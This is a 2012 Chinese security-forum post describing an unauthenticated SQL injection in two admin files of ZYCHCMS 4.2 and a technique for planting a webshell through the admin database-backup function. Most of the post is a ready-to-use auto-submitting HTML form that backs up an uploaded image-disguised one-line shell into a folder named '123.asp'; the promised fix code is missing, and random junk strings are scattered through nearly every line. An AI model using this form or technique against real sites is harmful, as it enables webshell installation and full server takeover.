找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1885|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 @* V$ L- x0 ^) I
: ~8 n% ^& n; X* X2 s0 s" y; d& s7 @; y5 N( M0 x' A  I

  K" H( T! ~6 g# [# A9 l6 {影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
* Y: k9 {" P+ c. Z* ?6 A ①SQL注射漏洞$ y8 g7 M: w, w/ W
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
4 k0 s! h* L5 x6 z3 U 漏洞原因:未过滤
5 r( _( F8 I6 s3 x 漏洞代码:
. Y0 e! A% y; a0 F3 b. f/ R 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。" U3 e. K5 s8 E( ]) O& V
修复方法:在文件开头加入代码
8 V# j* l- N" i$ L$ u7 v
8 u0 t( U' f+ x  g
  n# ?; D4 e0 C" U& W  ]8 |②后台拿WBSHELL
; S/ Q4 I) Q$ T: ?3 I8 e 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。# p6 x- y0 R6 X7 S% z
这里在网上找了一个,改了下,将就着用。
, A9 I7 H/ K) q7 e& A5 q1 Y4 I 以下是代码本地提交代码6 t8 t* A9 K3 j: l8 v% l8 d( q, f

: A& E7 ]% P2 j0 {2 r5 Y+ G) ?1 _
+ R% G' v& v7 e; p<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>6 y# i! a* B) ~! z2 r0 w5 w
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>! [' I. [6 t2 H# G- l6 J' G6 ]! ]
<tr>
' M" |: J, X- i1 m9 M <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>' m7 u$ W  O2 o4 S  M& i* n
</tr>4 c. I  @% l2 Q. x- h5 _
<tr>! v& r* A! V" c- j
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
1 k: H8 E) |0 d4 S' w8 v </span>
; j& ]9 u# V! A3 O0 O- A; I- k <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >. P9 {# R4 ~, I' A* O" o
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ ># |6 \; C3 J8 p& U( D
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>* I, ~9 u% p6 H4 z/ y; e1 M
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d/ E! y0 U! o8 o$ i0 A
<div align=”left”>
0 D- J8 o( P! I+ S- B' J <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
. z! f: C1 R5 i2 c7 U <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>% d+ I3 S& `% J3 U4 I; s1 h/ `
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />; D- Q8 h! g* P0 N3 a  b% ^
</div></td>
7 U  B& F: n& L$ T$ _ </tr>0 e0 T5 A- D1 U, n# F, r
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>" h% }9 m, x% J; i  F% S) c0 z
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>/ O+ ~. I0 ~; z: W' Y( q' d: A& x
<td class=”td”><div align=”left”>
: L# z9 d% s. n- u <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
6 o- c$ w. b5 @/ Z; v [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
4 D. X7 P7 g' L1 Y9 {5 F* O </tr>
+ @4 r0 ?0 U  Q" t# v( D$ v <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>! {6 E% z% s7 `# L
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
' F/ L& X! K, c2 P6 P+ b, } <td class=”td”><div align=”left”>2 G; }' v  P4 U; S" i/ |
<input type=”submit” value=”确定备份” class=”btn”% E2 }% X6 A5 j2 M. c2 H
</div></td>! x$ G1 L$ Y" s& K" N2 {
</tr>
% l) c, V& Y4 o% i' S </table></td></tr></form>1 i" R$ F: p( R# ~3 T0 S9 s& t
</table>/ M: i, x$ Z( V2 @- l/ R
</td>
- `5 ^9 n" g: N. b/ z </tr>" ]  l* B0 @5 i$ u: L- P
</table>
# |5 v0 |$ x5 X3 M7 i' d <script>4 ]' ^4 [, N3 T
document.all.add.submit();4 P* S" N* D: o5 `
</script>
- U7 U; j" h$ y- X# l5 G/ G
1 k: f: g" }1 i* X# o* x. F9 t: v
& K' N7 T! S5 c2 F) C# n' V" ?" F2 F* n+ J9 R/ o& h2 }- L, B. p
5 O' [( |! _. v
7 B# ^7 C7 I3 k7 u# w7 E3 B. ?
% e6 ^2 A0 r+ i  V0 i

6 X, B- W' R+ ]5 l3 ~& q# O1 x
* ?' ~% B" |' S' A' Y3 `* \: z! ]$ h1 K
) w" D% k' s1 b% `# f" O' {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表